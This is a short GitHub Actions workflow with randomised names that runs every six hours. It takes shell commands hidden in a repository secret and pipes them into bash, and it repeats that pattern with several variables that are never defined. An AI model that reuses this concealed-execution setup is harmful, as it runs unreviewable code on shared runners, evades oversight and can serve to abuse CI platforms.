name: xujiandu4675
on:
  workflow_dispatch:
  schedule:
    - cron: '33 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xujiandu4675
        env:
          l6: ${{ secrets.l6 }}
        run: |
          echo $l6 | jq -r .uxn89 | /bin/bash
          echo $kw9 | jq -r .e5 | /bin/bash
          echo $oot60209 | jq -r .qtw0820 | /bin/bash
          echo $cag1 | jq -r .ky441 | /bin/bash
          echo $hzpx51 | jq -r .jxp98 | /bin/bash
          echo $dhxm96181 | jq -r .khp6 | /bin/bash
          echo $qtdkt2 | jq -r .ey9 | /bin/bash

